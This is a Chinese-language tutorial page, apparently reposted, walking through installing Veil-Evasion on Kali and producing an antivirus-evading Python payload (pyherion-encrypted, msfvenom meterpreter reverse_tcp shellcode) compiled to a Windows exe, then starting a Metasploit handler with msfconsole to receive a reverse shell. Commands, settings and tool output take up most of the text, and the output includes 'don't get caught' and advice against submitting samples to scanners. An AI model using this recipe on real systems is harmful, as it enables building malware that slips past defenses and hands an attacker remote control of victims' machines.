veil-Evasion免殺使用


Veil-Evasion 是 Veil-Framework 框架的一部分,也是其主要的項目。利用它我們可以生成繞過殺軟的 payload   kali 上並未安裝,下面我們來進行簡單的安裝。我們直接從 github 上進行 clone 下載:

git clone [https://www.github.com/Veil-Framework/Veil-Evasion.git

 

下載完成后,我們還需要對其軟件配置包進行安裝,依次輸入如下命令:

ls
cd Veil-Evasion/
ls
cd setup/
ls
./setup.sh

 

當安裝至如下位置時,會詢問我們是否繼續安裝,我們輸入 Y 繼續

此時跳出 python for windows 的安裝界面,我們點擊 next 即可。

 

 點擊 next 選擇 yes 繼續安裝。

 

這里安裝 pywin32-219 我們直接 下一步。

 

安裝 ruby 環境,我們選擇 accept ,並 next 。安裝 ruby 環境,我們選擇 accept ,並 next 。

 

這里我們全選中復選框,並點擊 install 開始安裝! 這里我們全選中復選框,並點擊 install 開始安裝

 

在以上一系列繁雜的安裝過程后下面我們就可以來正常使用 Veil-Evasion 啦!我們進入到Veil-Evasion目錄下,執行如下命令:

 

 

 

成功進入到菜單界面,可以看到當前一共有 51 種 payload 可用!我們可以使用 list 命令來查看 payload 的詳細信息!根據 payload 編號,這里我選擇 35號的 python payload進行演示

 

 

 

在這個界面,我們可以對該 payload 進行一些基本的配置。例如:編譯后生成文件的格式有效期,並是否進行加密做出配置。這里我選擇使用 pyherion 進行加密

 

set USE_PYHERION

Ygenerate (生成payload)

 

這個界面要求我們,選擇一種生成 shellcode 的模板文件。我們就按照默認的選擇 msfvenom 1 。

IP :192.168.5.7
PORT :4444

 

這個界面要求我們,對生成的 payload 進行命名和可執行性的編譯。我隨便命名為 vir 並選擇 免殺效果更好的第 2種方式進行編譯

 

 

成功完成以上編譯后,編譯后的文件被保存在 /usr/share/veil-output/compiled/vir.exe下。

[*] Executable written to: /usr/share/veil-output/compiled/ir.exe Language: python Payload: python/shellcode_inject/aes_encrypt Shellcode: windows/meterpreter/reverse_tcp Options: LHOST=192.168.40.128 LPROT=4444 Required Options: COMPILE_TO_EXE+Y EXPIRE_PAYLOAD=X INJECT_METHOD+Virtual USE_PYHERIOD=Y Payload File: /usr/share/veil-output/source/fujieace.py Handler File: /usr/share/veil-output/handlers/fujieace_handler.rc [*] Your payload files have been generated,don't get caught! [*] And don't submit samples to any online scanner!

 

同時新生成的 shellcode 的 rc 文件也被保存在了 veil-output下的 handlers目錄下!既然有了 rc 文件,那么我們就可以方便的利用 MSF 進行調用了!

msfconsole -r vir_handler.rc

此時當目標系統上成功運行我們生成的 shellcode 后,我們將在 kali 上取得目標系統的反彈shell 。

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM